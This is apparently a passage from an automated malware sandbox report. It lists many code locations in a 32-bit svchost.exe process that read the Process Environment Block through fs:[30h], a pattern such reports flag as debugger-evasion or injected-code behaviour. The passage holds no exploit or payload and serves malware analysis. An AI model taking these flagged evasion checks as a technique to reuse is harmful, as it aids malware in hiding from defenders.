                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
